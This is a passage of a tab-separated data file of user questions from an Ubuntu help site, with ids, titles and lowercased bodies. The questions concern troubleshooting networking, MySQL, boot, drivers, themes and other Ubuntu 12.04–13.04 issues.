version : 01 serial : 9c : b7:0d:96 : e9:52 width : 64 bits clock : 33mhz capabilities : pm msi pciexpress bus_master cap_list ethernet physical wireless configuration : broadcast=yes driver=ath9k driverversion=3.8.0-19-generic firmware=n/a ip=192.168.8.134 latency=0 link=yes multicast=yes wireless=ieee 802.11bgn resources : irq:18 memory : c0500000-c050ffff and lspci : 00:00.0 host bridge : intel corporation 2nd generation core processor family dram controller ( rev 09 ) 00:02.0 vga compatible controller : intel corporation 2nd generation core processor family integrated graphics controller ( rev 09 ) 00:16.0 communication controller : intel corporation 6 series/c200 series chipset family mei controller # 1 ( rev 04 ) 00:19.0 ethernet controller : intel corporation 82579v gigabit network connection ( rev 04 ) 00:1a.0 usb controller : intel corporation 6 series/c200 series chipset family usb enhanced host controller # 2 ( rev 04 ) 00:1b.0 audio device : intel corporation 6 series/c200 series chipset family high definition audio controller ( rev 04 ) 00:1c.0 pci bridge : intel corporation 6 series/c200 series chipset family pci express root port 1 ( rev b4 ) 00:1c.2 pci bridge : intel corporation 6 series/c200 series chipset family pci express root port 3 ( rev b4 ) 00:1c.4 pci bridge : intel corporation 6 series/c200 series chipset family pci express root port 5 ( rev b4 ) 00:1d.0 usb controller : intel corporation 6 series/c200 series chipset family usb enhanced host controller # 1 ( rev 04 ) 00:1f.0 isa bridge : intel corporation hm65 express chipset family lpc controller ( rev 04 ) 00:1f.2 sata controller : intel corporation 6 series/c200 series chipset family 6 port sata ahci controller ( rev 04 ) 01:00.0 system peripheral : ricoh co ltd pcie sdxc/mmc host controller ( rev 07 ) 02:00.0 network controller : atheros communications inc. ar9285 wireless network adapter ( pci-express ) ( rev 01 ) 03:00.0 usb controller : nec corporation upd720200 usb 3.0 host controller ( rev 04 ) the only solution that kind of worked for me ( which i found in similar questions to previous releases ) was adding to /etc/network/interfaces the following lines . auto eth0 iface eth0 inet dhcp but then whenever i boot without wired connection i get problems with network configuration and have to wait a long time before the system starts . i understand that the problem is with my e1000e driver ( correct ? ) but i 'm not really sure what i could do about it . i appreciate any suggestions .
292500	why is this laptop taking almost 1 minute to boot ubuntu 13.04 ?	my dad 's new hp pavilion dv6 laptop running ubuntu 13.04 takes almost a minute to boot up - it seems like it 's hanging somewhere . is there something i can do to easily fix it ? i need some help deciphering the bootchart . here it is : for better browsing : http : //i.imgur.com/u4xci05.png
292512	how to change the default theme for all users ?	how to change the default theme to the classic theme for all users in ubuntu 12.04 ?
292515	how can i send email from my website on ubuntu server	i am using ubuntu 12.04 and i have installed appache , php , and mysql all the latest versions . i have my website on the root folder of this machine . now , i want an email be sent to my boss when ever some one downloads a document from the website after filling the form . i already have designed a form and made all the neccessary validations as well . but i do not know how to send those form contents to my boss in her email address ! ! i love ubuntu and am enjoying it and am a beginner ! would any one please help me ? ? thank you so much ! joye
292523	there is any application that can be used to monitor for much time a computer is turned on ?	i need an application that monitor how much time the computer is turned on . for example if i start the system at 12:03 am and shut it down it at 3:16 pm and then in the same day i turn it on at 4:54 pm and shut it down at 7:47 pm , it would save this data so it could be reviewed later . do you know any application that perform such task ?
292524	symbol lookup error : undefined symbol : _gfortran_internal_malloc64	ubuntu 13.04 here . i was trying to use a program called smartpca and the first time i tried to use it , it raised a dependency error about a liblapack . i installed libatlas3-base and it was solved . then it raised another error about libgfortran.so.1 . since i had all libfortran packages installed , i created a link between libgfortran.so.3 and libgfortran.so.1 . then i ran the program again and it raised that error : ./smartpca : symbol lookup error : ./smartpca : undefined symbol : _gfortran_internal_malloc64 from what i read , i understand that on fedora you have to install gfortran 4.1 . how can i solve this ?
292526	what do people use instead of the discontinued weather-indicator in 13.04 ?	the weather-indicator package have been removed from ubuntu 13.04 ( it crashed all the time and did not display forecasts ) . what is the replacement package ?
292535	how to get caps/num/scroll lock keys osd notification ?	i would like to have a osd notification display briefly everytime the caps , num , or scroll lock state toggles . is there a way to do this ?
292537	ubuntu 13.04 - wifi connection problem	i 'm using ubuntu 13.04 ( im a newbie ) on toshiba satellite c855 with realtek rtl8723ae network adapter . sometimes it connects normally and i can browse the internet , but when i close the screen ( standby ) shut down or restart , the connection disappears and i cant connect any more . it keeps asking me for a password ( of course i have it ) , but it wont connect ... i also have usb adapter that works great ( just plug in and i am connected ) , but i want to use internal adapter to be more mobile . i found another question with similar problem and it has an answer ! cant connect to wifi on 13.04 i typed sudo rfkill in the terminal and it seems to work ! : ) hope its goiing to last ...
292542	keyboard shortcut to toggle auto-hide unity launcher	i would like to create a keyboard shortcut to toggle the auto-hide option for the unit launcher . based on the answer on how to programmatically change the launcher 's hide behaviour i tried to make a python script to do the job . then i should just figure out how to run that with a keyboard shortcut . my script looks like this : # ! /bin/python autohide= $ ( dconf read /org/compiz/profiles/unity/plugins/unityshell/launcher-hide-mode ) if ( autohide==1 ) : dconf write /org/compiz/profiles/unity/plugins/unityshell/launcher-hide-mode 0 else : dconf write /org/compiz/profiles/unity/plugins/unityshell/launcher-hide-mode 1 but running the script from a terminal ( doing 'python scriptname.py ' ) does n't work . i get a `` invalid syntax '' error at $ sign . you have to know that i have almost no knowledge of python ( or writing scripts in general ) . ( i 've just spent a few hours searching the web for help and examples ) . so the actual questions : what did i do wrong ? did i chose a way to complicated approach for this and how can i do it more easily in that case ?
292544	java doesnt work if used from gnome	when i try to install something ( which uses installanywhere ) from terminal in gnome i got something like that : preparing to install ... extracting the jre from the installer archive ... unpacking the jre ... extracting the installation resources from the installer archive ... configuring the installer for this system 's environment ... no java virtual machine could be found from your path environment variable . you must install a vm prior to running this program . workaround of that is connecting to localhost via ssh or switching to console with ctrl+alt+f [ x ] before starting installation . calling java from command line or whereis java shows proper paths .
292546	i can ping some host but not all from network on openvpn tun	i have a network i want to connect to which is behind a firewall ( iptables ) . on the same pc there 's the openvpn server . it 's directly connected to the internet . i can connect to the server through openvpn . i can ping some of the ips but not all from the 10.0.0.0 network ( inside network ) . i can ping vms from a server but i ca n't ping the server . all of the machines are accesible locally . i have n't got a clue what should i try next
292547	rhythmbox-metadata uses 100 % cpu	everytime i start rhythm box the process rhythmbox-metadata starts up and uses 100 % cpu on one core , causing the computer to heat up and the fans to start rotating hard . i have an external drive with about 450gb of music . rhythmbox-metadata will remain active at 100 % cpu for an hour and then stop consuming cpu . this happens everytime i open rhythm box even if nothing changed in the music folder . how can i stop this behaviour ?
292549	wireless problem : once turned off wo n't turn on , does not show wlan0	i am a linux newbie . i attended a linux intro . workshop and i faced this problem during the workshop even organisers were not able to solve them so i am posting it here : when i run ifconfig command on my laptop it does n't show any wireless extensions such as wlan0 -- even if i am connected to wireless -- so i tried iwconfig and it said `` no wireless extensions . '' but both wifi and bluetooth are working properly . just there is one problem . sometimes if i switch off wireless ( from ubuntu or windows ) then ubuntu is not able to switch it on i have to boot into windows and then start it from there ( this does not happen always ) ! is there anything seriously wrong with my laptop ? info about my laptop : hp pavillion dv6 intel i7 , ram 8gb triple booted with lubuntu , ubuntu and windows i am running 32 bit ubuntu thanks in advance !
292557	sendmail relaying email through a record not mx	i have a ubuntu server , running sendmail ( until this morning it was running postfix , but i moved to sendmail to eliminate the possibility of my postfix configuration tweaks being the cause of this issue ) . up until a few weeks ago , this server was the sole mail server for my domain - and until i moved mail away from this box , email worked as expected , was delivered to the local users and was sent fine - but since moving it away , every time an email is sent through the mta on this box it attempts to send it to the a record for my domain , rather than the mx records ... which does n't work very well as i use a cdn , and the cdn are n't hosting my mail funnily enough . from everywhere else to my domain is fine , and from that server sending to other domains is fine . if you perform a dig or an nslookup from the problem server the records appear correct , so after battling with this for nearly a week i 'm stumped . any help would be appreciated ! edit : dns records for domain ; domain.com cname to server.domain.com server.domain.com a to 1.1.1.1 mx mail.maildomain.com priority 10 mx mail1.maildomain.com priority 20 the server with issues is server.domain.com . thanks
292559	problem at opening nasa world wind . i get a terminal error ( java problem )	the program is zipped and these are the instruccions in readme file : 2 ) cd to the world wind release folder . 3 ) chmod +x run-demo.bash 4 ) ./run-demo.bash gov.nasa.worldwindx.examples.applicationtemplate i type step 4 and i get this terminal error running gov.nasa.worldwindx.examples.applicationtemplate ./run-demo.bash : lă­nea [ line ] 16 : java : orden no encontrada [ command not found ] the program use .jnlp files , opened with oracle java web start , included in java runtime environment . maybe i do n't have it , how i can know it ? searching on my computer i only found two files : javawebstartapplettemplate.jnlp and javawebstarttemplate.jnlp . i tried to open the .jnlp files on this page http : //goworldwind.org/demos/ with both files ( i know it sounds stupid ) and of course i did n't get anything . thank you for read it and i hope you can give me a hand .
292563	after connection second display window manger/unity fail to start	i am running 13.04 . amd rv710 . dual 1900x1200 . i installed on a single display and when i added the new one i got a lot of oddities . one is that one reboot sometimes i just do n't get a window manager . it sometimes crashes as well . been very happy up to this point but i am running vm 's in virutalbox and this is a work machine so i might have to go another route if this does n't get figured out . any thoughts ?
292564	ca n't figure out how to install `` humble double fine bundle ''	i just bought the humble double fine bundle and downloaded the .bin file , and it says it uses the mojo installer . when i 'm trying to open the installer i get this error : jeggy @ jeggy-xps : ~/niðurtøkur $ sudo ./costumequest-linux-2013-05-07-setup.bin ./costumequest-linux-2013-05-07-setup.bin : error while loading shared libraries : libbz2.so.1 : can not open shared object file : no such file or directory i googled and i found this : and that looks just like my problem , but the link is dead now : / i am running ubuntu 13.04 64bit edit : it says i have libbz2-1.0 installed jeggy @ jeggy-xps : ~/niðurtøkur $ sudo apt-get install libbz2-1.0 reading package lists ... done building dependency tree reading state information ... done libbz2-1.0 is already the newest version . 0 upgraded , 0 newly installed , 0 to remove and 0 not upgraded . ldd : jeggy @ jeggy-xps : ~/niðurtøkur $ ldd ./costumequest-linux-2013-05-07-setup.bin linux-gate.so.1 = > ( 0xf77a9000 ) libpthread.so.0 = > /lib/i386-linux-gnu/libpthread.so.0 ( 0xf7769000 ) libbz2.so.1 = > not found libdl.so.2 = > /lib/i386-linux-gnu/libdl.so.2 ( 0xf7763000 ) libm.so.6 = > /lib/i386-linux-gnu/libm.so.6 ( 0xf7720000 ) libc.so.6 = > /lib/i386-linux-gnu/libc.so.6 ( 0xf756d000 ) /lib/ld-linux.so.2 ( 0xf77aa000 ) jeggy @ jeggy-xps : ~ $ sudo find / -name libbz2.so.1 [ sudo ] password for jeggy : /home/jeggy/.local/share/steam/ubuntu12_32/steam-runtime/i386/lib/i386-linux-gnu/libbz2.so.1 /lib/x86_64-linux-gnu/libbz2.so.1 it took very long until i got response from that command .
292565	ubuntu touch sdk problems	i have installed the ubuntu touch sdk the way it is advised on the ubuntu dev website ( with sudo apt-get install ubuntu ) . i 'm using ubuntu 13.04 . the problems/symptoms are the following : when i run a new qml project , i 've got qt creator saying : `` qqmlcomponent : component is not ready '' when i create a new project and run it using the `` tabbed ui '' preset , i ca n't swipe between tabs with a left to right or right to left gesture . when i create a new ubuntu touch qml project , i ca n't use qt designer . qt designer 's main frame remains empty . however , if i start a new qt quick project , then i can use qt designer . i do n't now if those problems are linked , the most important one being not able to use qt designer . thanks
292570	upgrade/update intellij 12	my intellij shows me that a minor version is available for upgrade . how do i go about upgrading the current version . do i have to create a new folder in /usr/share and change all references to the new version or is there a better way ?
292572	does ubuntu have gparted included ?	as the title suggests , i need a live distro that has gparted included to work on some hard drive partitions .
292579	trackpad multitouch gestures on 13.04	i have ubuntu 13.04 on an acer aspire 5750 that has a trackpad . i 'd like to use 3 or 4 finger multitouch gestures to perform certain actions . i can use 2 fingers to scroll , but i would like to , for example , use 3 fingers to change open windows - kind of like an alt+tab - and other multitouch gestures . i have no clue if my trackpad is capable of this kind of stuff . if it is , does ubuntu 13.04 support it , and how can i configure it ?
292580	how to generate wep keys from a passphrase	i have a passphrase and i want to generate a wep keys from it . are there a linux command for that ?
292583	how to disable touchpad running ubuntu 12.04lts on dell inspiron 1525	the touchpad on my dell laptop is an annoyance ; while typing , if i inadvertantly strike it , the `` i-beam '' ( or mouse pointer ) ends up somewhere other than where i want it . none of the settings i have tweaked thus far will kill the touchpad .
292586	system clock is 5.5 ahead although ntp	time zone here is asia/tehran , but the ubuntu time is 5h30m ahead of local time . i 've checked configs and even installed ntp server , nothing seem to fix this , sudo dpkg-reconfigure tzdata current default time zone : 'asia/tehran' local time is now : thu may 9 00:49:38 irdt 2013 . universal time is now : wed may 8 20:19:38 utc 2013 . /etc/ntp.conf driftfile /var/lib/ntp/ntp.drift statistics loopstats peerstats clockstats filegen loopstats file loopstats type day enable filegen peerstats file peerstats type day enable filegen clockstats file clockstats type day enable server ir.pool.ntp.org server in.pool.ntp.org server tr.pool.ntp.org server ntp.ubuntu.com restrict -4 default kod notrap nomodify nopeer noquery restrict -6 default kod notrap nomodify nopeer noquery restrict 127.0.0.1 restrict : :1 here are current situation $ date sun may 12 17:15:39 irdt 2013 $ date -- utc sun may 12 12:45:40 utc 2013 according to google my local time is 11:45 am sunday , may 12 , 2013 ( irdt )
292589	revert to the original document folder	i have a unique problem and though i have tried to solve it on my own i could n't ... the problem is as follows : please take a backup of your files before you attempt to solve the problem . if you right click on the documents folder or downloads folder on the desktop then a menu opens . out of the many menu options , two options are there , namely copy and move to . if you click on either of the two options a sub menu appears with other options : home or desktop . if you select home then a dialog box appears asking if you want to merge the folders . if you click to merge the folders , the documents folder changes its appearance . it appears as a document with a lock on the top right corner and cross on the bottom right corner . now the document folder is not opening . it also shows that it 's not a folder . how can i revert back to the original document folder ? if you want i could send screen shots of the problem .
292592	curlftpfs not allowing users to change files	i have installed curlftpfs as per instructions i found on the net . i am mounting it in my fstab file using this command : curlftpfs # ftp : //user : pass @ ip /media/ftp fuse rw , uid=1000 , umask=0777 , user , suid , allow_other , exec , auto , utf8 0 0 problem is that my user can not edit anything in this folder . i can view anything i want , but i can not edit anything . anytime i try to edit something i get access denied errors . what would i need to change to allow any user on my system to edit files mounted here ?
292595	booting ubuntu 13.04 i386 from usb , main os is windows 7 , vaio s series , vpcs149fj	i 'm also one of the newbies at ubuntu and i intend on installing ubuntu 13.04 desktop i386 on my usb using universal usb installer , with some basic information provided on http : //www.ubuntu.com/download/desktop/create-a-usb-stick-on-windows which does n't , unfortunately , provides me with information about what to do after creation . do i just shut down , plug the usb in , start up , interrupt normal booting , choose booting device which is the usb , and done ? even if this succeeds , when i shut down in ubuntu , do i start up at windows 7 the next time ? what is the difference between 'trying ' ubuntu and 'installing ' ubuntu ? i 've heard that it 's possible to perform an installation on a usb . how ? a lot of info is appreciated ! ! ! thanks in advance ! ! !
292599	network problem with rx overruns	i have a cluster of 10 machines . ifconfig on 5 of them show a very high number of rx overruns . the machines are similar , but i have noticed that the 5 that are having problems all have an `` a2 '' version of the nvidia mcp61 ethernet controller . the 5 that do n't have problems are all version `` a1 '' . lshw shows i 'm running version 0.64 of the forcedeth driver . the nvidia drivers page shows a version 1.21 available . where should i go from here ? i 'm hoping a driver update might fix , but i can not find a newer driver version i can install with my meager linux skills . ifconfig : eth0 link encap : ethernet hwaddr 00:18 : f3:85 : bf:5f inet addr:192.168.2.156 bcast:192.168.2.255 mask:255.255.255.0 inet6 addr : fe80 : :218 : f3ff : fe85 : bf5f/64 scope : link up broadcast running multicast mtu:1500 metric:1 rx packets:3419054 errors:156023 dropped:0 overruns:156020 frame:3 tx packets:3573355 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:3023023298 ( 3.0 gb ) tx bytes:3457772254 ( 3.4 gb ) lshw : *-bridge description : ethernet interface product : mcp61 ethernet vendor : nvidia corporation physical id : 7 bus info : pci @ 0000:00:07.0 logical name : eth0 version : a2 serial : 00:18 : f3:85 : bf:5f size : 1000000000 capacity : 1000000000 width : 32 bits clock : 66mhz capabilities : bridge pm msi ht bus_master cap_list ethernet physical mii 10bt 10bt-fd 100bt 100bt-fd 1000bt-fd autonegotiation configuration : autonegotiation=on broadcast=yes driver=forcedeth driverversion=0.64 duplex=full ip=192.168.2.156 latency=0 link=yes maxlatency=20 mingnt=1 multicast=yes port=mii speed=1gbit/s resources : irq:43 memory : dfffd000-dfffdfff ioport : e480 ( size=8 ) ethtool : settings for eth0 : supported ports : [ mii ] supported link modes : 10baset/half 10baset/full 100baset/half 100baset/full 1000baset/full supported pause frame use : no supports auto-negotiation : yes advertised link modes : 10baset/half 10baset/full 100baset/half 100baset/full 1000baset/full advertised pause frame use : no advertised auto-negotiation : yes speed : 1000mb/s duplex : full port : mii phyad : 1 transceiver : external auto-negotiation : on supports wake-on : g wake-on : d link detected : yes
292601	can not get mysql to work/start even after clean install	i am completely stumped right now , whilst i am not an advanced user , i know my way around ubuntu and so tried to look into things with the help of certain forum topics . the problem : today , quite randomly , mysql stopped working on my local laptop . i could no longer get the service to start up either $ sudo mysql start error 2002 ( hy000 ) : ca n't connect to local mysql server through socket '/var/run/mysqld/mysqld.sock ' ( 111 so after a lot of searching and checking file permissions as other posts have suggested i decided enough was enough and went for the complete reinstall of mysql . this also did n't work . and so i found this post to go for a complete purge : mysql fails to start ( after upgrade , installation , etc.. ) again no luck , and a lot of other posts i found either have solutions which have n't worked for me , or do not have any solution at all . not really sure what to try next , or whether this is a common issue others are having . any suggestions on tests i can run would be most appreciated to resolve this as i could really do with having mysql back and working again . the current errors i get when i go to reinstall mysql are : setting up mysql-client-5.5 ( 5.5.31-0ubuntu0.13.04.1 ) ... setting up mysql-server-5.5 ( 5.5.31-0ubuntu0.13.04.1 ) ... start : job failed to start invoke-rc.d : initscript mysql , action `` start '' failed . dpkg : error processing mysql-server-5.5 ( -- configure ) : subprocess installed post-installation script returned error exit status 1 processing triggers for libc-bin ... no apport report written because maxreports has already been reached ldconfig deferred processing now taking place errors were encountered while processing : mysql-server-5.5 e : sub-process /usr/bin/dpkg returned an error code ( 1 ) a package failed to install . trying to recover : setting up mysql-server-5.5 ( 5.5.31-0ubuntu0.13.04.1 ) ... start : job failed to start invoke-rc.d : initscript mysql , action `` start '' failed . dpkg : error processing mysql-server-5.5 ( -- configure ) : subprocess installed post-installation script returned error exit status 1 errors were encountered while processing : mysql-server-5.5 so it 's implying an issue with mysql-server-5.5 but not sure what or why , as this should be completely fresh . thanks for any time and/or advice you can give , dan update1 found a new post with a new idea , no luck , but more error information potentially to help debug this $ sudo apt-get -f install reading package lists ... done building dependency tree reading state information ... done 0 upgraded , 0 newly installed , 0 to remove and 0 not upgraded . 1 not fully installed or removed . after this operation , 0 b of additional disk space will be used . setting up mysql-server-5.5 ( 5.5.31-0ubuntu0.13.04.1 ) ... start : job failed to start invoke-rc.d : initscript mysql , action `` start '' failed . dpkg : error processing mysql-server-5.5 ( -- configure ) : subprocess installed post-installation script returned error exit status 1 errors were encountered while processing : mysql-server-5.5 e : sub-process /usr/bin/dpkg returned an error code ( 1 ) update2 results of the error.log in mysql $ tail /var/log/mysql/error.log /usr/sbin/mysqld ( +0x59043a ) [ 0xb745943a ] /usr/sbin/mysqld ( +0x590cd3 ) [ 0xb7459cd3 ] /usr/sbin/mysqld ( +0x585fea ) [ 0xb744efea ] /usr/sbin/mysqld ( +0x4c57b9 ) [ 0xb738e7b9 ] /usr/sbin/mysqld ( +0x4b785e ) [ 0xb738085e ] /usr/sbin/mysqld ( +0x4ba8f1 ) [ 0xb73838f1 ] /lib/i386-linux-gnu/libpthread.so.0 ( +0x6d78 ) [ 0xb6e78d78 ] /lib/i386-linux-gnu/libc.so.6 ( clone+0x5e ) [ 0xb6c083de ] the manual page at http : //dev.mysql.com/doc/mysql/en/crashing.html contains information that should help you find out what is causing the crash . retrobadger @ laptop-badger : ~ $ tail -n50 /var/log/mysql/error.log innodb : please refer to innodb : http : //dev.mysql.com/doc/refman/5.5/en/forcing-innodb-recovery.html innodb : about forcing recovery . 130509 11:30:18 innodb : assertion failure in thread 2792295232 in file fsp0fsp.c line 3309 innodb : we intentionally generate a memory trap . innodb : submit a detailed bug report to http : //bugs.mysql.com . innodb : if you get repeated assertion failures or crashes , even innodb : immediately after the mysqld startup , there may be innodb : corruption in the innodb tablespace . please refer to innodb : http : //dev.mysql.com/doc/refman/5.5/en/forcing-innodb-recovery.html innodb : about forcing recovery . 10:30:18 utc - mysqld got signal 6 ; this could be because you hit a bug . it is also possible that this binary or one of the libraries it was linked against is corrupt , improperly built , or misconfigured . this error can also be caused by malfunctioning hardware . we will try our best to scrape up some info that will hopefully help diagnose the problem , but since we have already crashed , something is definitely wrong and this may fail . key_buffer_size=16777216 read_buffer_size=131072 max_used_connections=0 max_threads=151 thread_count=0 connection_count=0 it is possible that mysqld could use up to key_buffer_size + ( read_buffer_size + sort_buffer_size ) *max_threads = 346064 k bytes of memory hope that 's ok ; if not , decrease some variables in the equation . thread pointer : 0x0 attempting backtrace . you can use the following information to find out where mysqld died . if you see no messages after this , something went terribly wrong ... stack_bottom = 0 thread_stack 0x30000 /usr/sbin/mysqld ( my_print_stacktrace+0x33 ) [ 0xb72ea683 ] /usr/sbin/mysqld ( handle_fatal_signal+0x48c ) [ 0xb71af2fc ] [ 0xb6ea6400 ] /usr/sbin/mysqld ( +0x53c7da ) [ 0xb74057da ] /usr/sbin/mysqld ( +0x4ee825 ) [ 0xb73b7825 ] /usr/sbin/mysqld ( +0x4eefcc ) [ 0xb73b7fcc ] /usr/sbin/mysqld ( +0x59043a ) [ 0xb745943a ] /usr/sbin/mysqld ( +0x590cd3 ) [ 0xb7459cd3 ] /usr/sbin/mysqld ( +0x585fea ) [ 0xb744efea ] /usr/sbin/mysqld ( +0x4c57b9 ) [ 0xb738e7b9 ] /usr/sbin/mysqld ( +0x4b785e ) [ 0xb738085e ] /usr/sbin/mysqld ( +0x4ba8f1 ) [ 0xb73838f1 ] /lib/i386-linux-gnu/libpthread.so.0 ( +0x6d78 ) [ 0xb6e78d78 ] /lib/i386-linux-gnu/libc.so.6 ( clone+0x5e ) [ 0xb6c083de ] the manual page at http : //dev.mysql.com/doc/mysql/en/crashing.html contains information that should help you find out what is causing the crash . update3 may 9 09:51:11 laptop-badger mysqld_safe [ 4193 ] : 130509 9:51:11 innodb : error : page 11444 log sequence number 7800613976 may 9 09:51:11 laptop-badger mysqld_safe [ 4193 ] : innodb : is in the future ! current system log sequence number 7672896206 . may 9 09:51:11 laptop-badger mysqld_safe [ 4193 ] : innodb : your database may be corrupt or you may have copied the innodb may 9 09:51:11 laptop-badger mysqld_safe [ 4193 ] : innodb : tablespace but not the innodb log files . see may 9 09:51:11 laptop-badger mysqld_safe [ 4193 ] : innodb : http : //dev.mysql.com/doc/refman/5.5/en/forcing-innodb-recovery.html may 9 09:51:11 laptop-badger mysqld_safe [ 4193 ] : innodb : for more information .
292603	re-use toolbar code for each tab	i 'm creating a music app using qml and it uses around five tabs , each using a toolbar . the toolbar should look the same , so instead of having the exact same code for each tab , i wanted to re-use the code of only one toolbar for each of the tabs . i tried using an external .qml file with only the toolbar code , but it did not work . how do i re use the same code for the toolbar , instead of copy paste the same code multiple times in the code file ?
292606	missing keystrokes in ubuntu 13.04	this has only been a problem since upgrading to ubuntu 13.04 from 12.10 . for some reason , when typing i lose lots of keystrokes . it does n't seem to matter which application i 'm typing in . it happens a lot in empathy and firefox . i checked the universal access settings for keyboard and they are all disabled . any ideas ?
292614	ghdl in ubuntu 13.04	just installed ubuntu 13.04 after formating my laptop , and for some reason i can not install ghdl . after adding the ppa with this command : sudo add-apt-repository ppa : pgavin/ghdl everything is fine , but when i try do : sudo apt-get install ghdl i get an error saying : the ghdl package has no available version . any way to solve it ?
292620	internet data card connection mtnl 3g in ubuntu 12.10	i wish to connect internet data card from mtnl 3g 'jadoo ' with ubuntu 12.10 . how can i do it ? i see a deb package but i am unable to use apt as the os is not updated or apt has not been installed . is there any other way round .
292622	can not resolve dns on 12.10 install	i am very new to networking on ubuntu so i have been struggling with this issue for several hours now . i am running a fresh install of ubuntu 12.10 and i am unable to resolve dns when using my wireless connection . i have followed many of the solutions i found through some googling but still ca n't get it to work . i tried adding the google name servers to /etc/resolv.conf but that did n't help . i also tried adding static name servers through the network manager and that was unsuccessful as well . i get the following when i enter ifcongig -a on the command line . eth0 link encap : ethernet hwaddr 00:26:2d:7f : ea:7c up broadcast multicast mtu:1500 metric:1 rx packets:0 errors:0 dropped:0 overruns:0 frame:0 tx packets:0 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:0 ( 0.0 b ) tx bytes:0 ( 0.0 b ) interrupt:16 lo link encap : local loopback inet addr:127.0.0.1 mask:255.0.0.0 inet6 addr : : :1/128 scope : host up loopback running mtu:16436 metric:1 rx packets:247 errors:0 dropped:0 overruns:0 frame:0 tx packets:247 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 rx bytes:22898 ( 22.8 kb ) tx bytes:22898 ( 22.8 kb ) wlan0 link encap : ethernet hwaddr 70:1a:04 : e9:3a:4b inet addr:10.0.0.28 bcast:10.0.0.255 mask:255.255.255.0 inet6 addr : fe80 : :721a:4ff : fee9:3a4b/64 scope : link up broadcast running multicast mtu:1500 metric:1 rx packets:121 errors:0 dropped:0 overruns:0 frame:0 tx packets:403 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:41374 ( 41.3 kb ) tx bytes:38438 ( 38.4 kb ) my /etc/resolv.conf currently looks like this : nameserver 8.8.8.8 nameserver 8.8.4.4 and on doing dig google.com i get : ; < < > > dig 9.8.1-p1 < < > > google.com ; ; global options : +cmd ; ; connection timed out ; no servers could be reached on ping -c 10 8.8.8.8 , i get : ping 8.8.8.8 ( 8.8.8.8 ) 56 ( 84 ) bytes of data . from 10.0.0.28 icmp_seq=1 destination host unreachable from 10.0.0.28 icmp_seq=2 destination host unreachable from 10.0.0.28 icmp_seq=3 destination host unreachable from 10.0.0.28 icmp_seq=5 destination host unreachable from 10.0.0.28 icmp_seq=6 destination host unreachable from 10.0.0.28 icmp_seq=7 destination host unreachable from 10.0.0.28 icmp_seq=8 destination host unreachable from 10.0.0.28 icmp_seq=10 destination host unreachable -- - 8.8.8.8 ping statistics -- - 10 packets transmitted , 0 received , +8 errors , 100 % packet loss , time 8999ms pipe 4 here is my output for sudo route -n : kernel ip routing table destination gateway genmask flags metric ref use iface 0.0.0.0 10.0.0.1 0.0.0.0 ug 0 0 0 wlan0 10.0.0.0 0.0.0.0 255.255.255.0 u 9 0 0 wlan0 169.254.0.0 0.0.0.0 255.255.0.0 u 1000 0 0 wlan0 and my output for traceroute -n 8.8.8.8 : traceroute to 8.8.8.8 ( 8.8.8.8 ) , 30 hops max , 60 byte packets 1 10.0.0.28 1804.234 ms ! h 1804.210 ms ! h 1804.199 ms ! h i would also like to note that i am able to connect to the wireless network on my other devices and on my windows installation on the same machine . i also am able to get on the web when i connect through ethernet . i get this snippet for the wireless connection when i do ipconfig on my windows machine : wireless lan adapter wireless network connection : connection-specific dns suffix . : hsd1.ma.comcast.net . description . . . . . . . . . . . : atheros ar5b93 wireless network adapter physical address . . . . . . . . . : 70-1a-04-e9-3a-4b dhcp enabled . . . . . . . . . . . : yes autoconfiguration enabled . . . . : yes link-local ipv6 address . . . . . : fe80 : :b153:23b2:2384 : d341 % 12 ( preferred ) ipv4 address . . . . . . . . . . . : 10.0.0.28 ( preferred ) subnet mask . . . . . . . . . . . : 255.255.255.0 lease obtained . . . . . . . . . . : thursday , may 09 , 2013 1:50:10 pm lease expires . . . . . . . . . . : thursday , may 16 , 2013 3:39:12 pm default gateway . . . . . . . . . : 10.0.0.1 dhcp server . . . . . . . . . . . : 10.0.0.1 dhcpv6 iaid . . . . . . . . . . . : 225450500 dhcpv6 client duid . . . . . . . . : 00-01-00-01-17-d9-81-3a-00-26-2d-7f-ea-7c dns servers . . . . . . . . . . . : 75.75.75.75 75.75.76.76 netbios over tcpip . . . . . . . . : enabled any help would be greatly appreciated since this is really frustrating .
292628	remove php 5.4.14	i want to install php 5.3.10 but i already got php 5.4.13 . i want to remove first existing php 5.4.13 then want to install new php 5.3.13 . how can i remove existing php 5.4.13 ? ?
292631	linux-source-3.5.0 for ubuntu 12.04.2 ?	i have ubuntu 12.04.2 with kernel 3.5.0 and need to recompile some modules , but i`m getting hard to find the correct sources . apt-get only has sources for 3.2.0 ? where i can get the correct sources for the installed kernel 3.5.0 ? ?
292632	can i download visible body software ?	i 'd like to download the visible body software http : //www.visiblebody.com/download_overview my system is ubuntu 12.04 lts will this download work ? thanks .
292633	lubuntu 13.04 freezes when starting firefox	after upgrading to lubuntu 13.04 ( fresh install from alternate ) everything freezes when starting firefox . 12.04 and 12.10 were fine and it 's only firefox causing a total freeze of the system . any idea ? could it be an nvidia issue ?
292638	problem in burning a dvd and getting the iso file	i just downloaded the ubuntu 13.04 os ( 32-bit ) desktop version . it is a zip file , i extracted the contents of it and burned it into dvd . but i can not see the iso file , and how to make it bootable . please help with this because i really want to try it out . and i am using windows 7 right now .
292639	how to make latest ubuntu look like windows 7	for a talk about linux i will be using ubuntu to show off how flexible open source is , but one of the things i want to do is show ubuntu with a windows 7 theme , which i will then change when a friend just happens to ask `` but you are using windows 7 to talk about open source '' , at that moment i will change the whole theme back to the default ubuntu theme ( unity ) which should have a impact on users that have not yet moved to ubuntu . since i will be doing this on 13.04 ( examples for 11.04 up to 12.10 do not work in 13.04 ) i need a solution for this version . i have tried the following links and between not working and making the whole system unstable ( had to install from scratch ) they did not solve my question : is there an ubuntu theme available to make it look like windows 7 ? how to make ubuntu look like windows vista ? so how can i change ubuntu to a windows 7 theme in 13.04 ?
